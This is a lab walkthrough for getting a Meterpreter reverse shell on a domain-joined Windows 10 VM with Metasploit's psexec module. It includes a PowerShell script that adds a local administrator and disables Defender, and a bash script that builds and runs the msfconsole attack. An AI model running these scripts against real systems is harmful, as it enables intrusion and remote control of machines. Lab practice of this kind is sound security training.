Getting a Meterpreter session is always a wonderful thing. Once you have one you can elevate privileges, dump hashes, clear Windows event logs, download and upload files, and more. This walkthrough gets that session through Metasploit's psexec module against a domain-joined Windows 10 machine.
- Domain controller with Active Directory set up (see this series to set up your lab environment)
- Kali Linux
- Windows 10 VM joined to the domain
Setting your environment
On Kali, we're going to use exploit/windows/smb/psexec in Metasploit to get our Meterpreter session. psexec only works when the account you supply is a local administrator on the target (it has to write a service binary to the ADMIN$ share and start it as a service) and when nothing on the target quarantines that binary, so the Windows 10 VM needs some preparation first.
Go to your Windows 10 machine that is joined to the domain. Open File Explorer, go to your C:\ drive, right-click > New > Folder, and name the folder "Scans".
Note: Create this folder while logged in as a domain user. In this example the user is tgreyjoy (WINTERFELL\tgreyjoy).
Now that we have the new folder, enable sharing on it so that it is reachable over SMB from Kali.
Making your domain user a local administrator
Switch users to the domain administrator and add the domain user (WINTERFELL\tgreyjoy in this example) to the local Administrators group on the Windows 10 VM. This is the step that makes psexec possible: local administrator membership is what grants write access to ADMIN$ and the right to create a service. Note that the remote UAC token filter only restricts local accounts, so a domain account in the local Administrators group gets a full administrative token over the network.
Disable Windows Defender
Believe it or not, not everyone is running Windows Defender. Many environments are behind on patching or use a different AV product, so disabling Defender for this tutorial is not entirely unrealistic; the stock Metasploit service binary that psexec uploads is signatured by Defender and will be quarantined otherwise.
Once Defender is disabled, restart your Windows 10 VM. Be aware that the real-time protection toggle in Windows Security is temporary and Windows turns it back on by itself after a while, so check that it is still off after the reboot and before you run the exploit.
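The whole Windows-side preparation above (folder, share, local admin membership, Defender) as one script. This is an added example and not code from the original post; it assumes the domain WINTERFELL, the user tgreyjoy, the share name Scans and the path C:\Scans, and it is run in an elevated PowerShell on the Windows 10 VM while logged in as the domain administrator.

```powershell
# Added example (not from the original post): Windows 10 lab prep for exploit/windows/smb/psexec.
# Run in an elevated PowerShell on the domain-joined VM as the domain administrator.
# Assumed lab values (not from the post): domain WINTERFELL, user tgreyjoy, share "Scans" at C:\Scans.
$Domain    = 'WINTERFELL'
$User      = 'tgreyjoy'
$Member    = "$Domain\$User"
$ShareName = 'Scans'
$SharePath = 'C:\Scans'

# 1. Create the folder and share it, giving the domain user full access.
if (-not (Test-Path -Path $SharePath)) {
    New-Item -Path $SharePath -ItemType Directory | Out-Null
}
if (-not (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue)) {
    New-SmbShare -Name $ShareName -Path $SharePath -FullAccess $Member | Out-Null
}

# 2. Put the domain user in the local Administrators group. psexec needs to write
#    to ADMIN$ and create a service on the target; local admin grants both.
$alreadyAdmin = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
                Where-Object { $_.Name -ieq $Member }
if (-not $alreadyAdmin) {
    Add-LocalGroupMember -Group 'Administrators' -Member $Member
}

# 3. Turn off Defender real-time protection so the uploaded service binary is not
#    quarantined. If Tamper Protection is enabled this setting is not applied, and
#    it has to be switched off in the Windows Security app first.
Set-MpPreference -DisableRealtimeMonitoring $true

# 4. Verify every precondition before rebooting.
Get-SmbShare -Name $ShareName | Format-List -Property Name, Path
Get-LocalGroupMember -Group 'Administrators' | Where-Object { $_.Name -ieq $Member }
(Get-MpComputerStatus).RealTimeProtectionEnabled   # should be False

Restart-Computer -Confirm
```

Run the verification block again after the reboot: the Administrators membership and the share survive a restart, but Defender's real-time protection may have re-enabled itself.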
Getting Meterpreter Shell
The screenshots above cover the commands you need in msfconsole to get a Meterpreter shell with psexec: select exploit/windows/smb/psexec, set RHOSTS to the Windows 10 VM, set SMBDomain, SMBUser and SMBPass to the domain user you made a local administrator, set LHOST to your Kali address, and run exploit.
Note: If the default Automatic target fails, type "show targets" and then "set target <number>" to choose one explicitly. "Native upload" is the classic psexec technique (copy a service binary to ADMIN$ and start it through the Service Control Manager), so it is the one to try first.
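The Kali side as a script, so the run is reproducible instead of typed by hand. This is an added example and not code from the original post; the addresses 192.168.56.20 (Windows 10 VM) and 192.168.56.10 (Kali), the password Password1, the x64 Meterpreter payload and port 4444 are assumed lab values. The pre-flight check uses smbclient to confirm that the credentials can list ADMIN$, which is exactly the access psexec relies on, before msfconsole is started.

```bash
#!/usr/bin/env bash
# Added example (not from the original post): drive exploit/windows/smb/psexec from Kali
# with a generated msfconsole resource script, after checking ADMIN$ access first.
# Assumed lab values (not from the post): target 192.168.56.20, Kali 192.168.56.10,
# domain WINTERFELL, user tgreyjoy, password Password1, reverse TCP on port 4444.
set -euo pipefail

# Emit a resource script for the psexec module. Target index 0 is Automatic;
# the module's other targets are 1 PowerShell, 2 Native upload, 3 MOF upload,
# which is what "show targets" / "set target <number>" selects between.
build_psexec_rc() {
  local rhost=$1 lhost=$2 domain=$3 user=$4 pass=$5 target=${6:-0}
  cat <<EOF
use exploit/windows/smb/psexec
set RHOSTS $rhost
set SMBDomain $domain
set SMBUser $user
set SMBPass $pass
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
set target $target
exploit -j
EOF
}

# Pre-flight: psexec writes the service binary to ADMIN$, so if these credentials
# cannot list ADMIN$ the exploit will fail with an access-denied error.
check_admin_share() {
  local rhost=$1 domain=$2 user=$3 pass=$4
  smbclient "//$rhost/ADMIN\$" -U "$domain\\$user%$pass" -c 'ls' >/dev/null 2>&1
}

run_psexec() {
  local rhost=$1 lhost=$2 domain=$3 user=$4 pass=$5 target=${6:-0}
  local rc
  rc=$(mktemp /tmp/psexec.XXXXXX.rc)
  if ! check_admin_share "$rhost" "$domain" "$user" "$pass"; then
    echo "[-] $domain\\$user cannot list ADMIN\$ on $rhost: not a local admin, or SMB blocked" >&2
    return 1
  fi
  build_psexec_rc "$rhost" "$lhost" "$domain" "$user" "$pass" "$target" > "$rc"
  echo "[*] resource script written to $rc" >&2
  msfconsole -q -r "$rc"
}

# Usage: ./psexec_lab.sh run [target-index]
if [[ "${1:-}" == "run" ]]; then
  run_psexec 192.168.56.20 192.168.56.10 WINTERFELL tgreyjoy Password1 "${2:-0}"
fi
```

Invoke it as `./psexec_lab.sh run` for the Automatic target or `./psexec_lab.sh run 2` to force Native upload; `exploit -j` backgrounds the job, so use `sessions -i 1` in the console that opens to interact with the Meterpreter session.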